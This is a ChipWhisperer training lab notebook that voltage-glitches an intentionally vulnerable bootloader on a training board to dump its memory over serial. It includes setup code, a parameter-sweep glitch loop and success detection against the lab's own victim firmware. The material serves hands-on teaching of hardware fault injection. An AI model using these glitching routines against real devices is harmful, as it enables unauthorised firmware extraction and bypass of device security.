# Part 2, Topic 3: Voltage Glitching to Dump Memory (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous labs, we learned how voltage glitching can be used for a similar function as clock glitching. We also learned about how it has fewer limitations, but can be less reliable for certain target setups. It also changes a great deal based on the properties of the glitch circuit itself - even changing a wire can have a huge effect.*

*In this lab, we'll use what we learned in the last lab to again attack the vulnerable serial printing of the bootloader*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching
* Understanding how compiler optimizations can cause devices to behave in strange ways

## The Situation

You should already know the situation from your previous attempts at glitching this bootloader (as well as what the flaw is). No need to do big long searches for parameters, just use values that worked well for the previous tutorial.

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'

In [ ]:
%%bash -s "$PLATFORM"
cd ../../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = "../../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
scope.clock.adc_src = "clkgen_x1"

if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    target.baud = 38400*32/7.37
    def reboot_flush():            
        scope.io.pdic = False
        time.sleep(0.05)
        scope.io.pdic = "high_z"
        time.sleep(0.05)
        #Flush garbage too
        target.flush()
else:
    scope.clock.clkgen_freq = 24E6
    target.baud = 38400*24/7.37
    def reboot_flush():            
        scope.io.nrst = False
        time.sleep(0.05)
        scope.io.nrst = True
        time.sleep(0.05)
        #Flush garbage too
        target.flush()

reboot_flush()
scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
        
trig_len = scope.adc.trig_count

In [ ]:
glitch_spots = []
glitch_spots.extend([i for i in range(17008, 17011, 1)])
#Basic setup
scope.glitch.clk_src = "clkgen" # set glitch input clock
scope.glitch.output = "glitch_only" # glitch_out = clk ^ glitch
scope.glitch.trigger_src = "ext_single" # glitch only after scope.arm() called

In [ ]:
import chipwhisperer.common.results.glitch as glitch
      
gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset"])
gc.display_stats()

Now the rest is up to you! 

In [ ]:
from importlib import reload
import chipwhisperer.common.results.glitch as glitch
from tqdm.notebook import tqdm
import re
import struct

# put some good settings in for width, offset, and repeat
    
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    for i in tqdm(glitch_spots, leave=False):
        for _ in range(1):
            scope.glitch.ext_offset = i
            if scope.adc.state:
                gc.add("reset", (scope.glitch.width, scope.glitch.offset))
                reboot_flush()
            target.flush()
            scope.arm()
            target.write("p516261276720736265747267206762206f686c207a76797821\n")
            ret = scope.capture()
            if ret:
                gc.add("reset", (scope.glitch.width, scope.glitch.offset))
                reboot_flush()
            else:
                time.sleep(0.05)
                output = target.read(timeout=2)
                if "767" in output:
                    print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(i, scope.glitch.offset, scope.glitch.width))
                    gc.add("success", (scope.glitch.width, scope.glitch.offset))
                    broken = True 
                    for __ in range(500):
                        num_char = target.in_waiting()
                        if num_char:
                            my_print(output)
                            output = target.read(timeout=50)
                    time.sleep(1)
                    break
                elif "r0" not in output:
                    gc.add("reset", (scope.glitch.width, scope.glitch.offset))
                else: #tough time detecting glitches
                    if scope.adc.trig_count != trig_len:
                        gc.add("reset", (scope.glitch.width, scope.glitch.offset))
                    else:
                        gc.add("normal", (scope.glitch.width, scope.glitch.offset))

In [ ]:
scope.dis()
target.dis()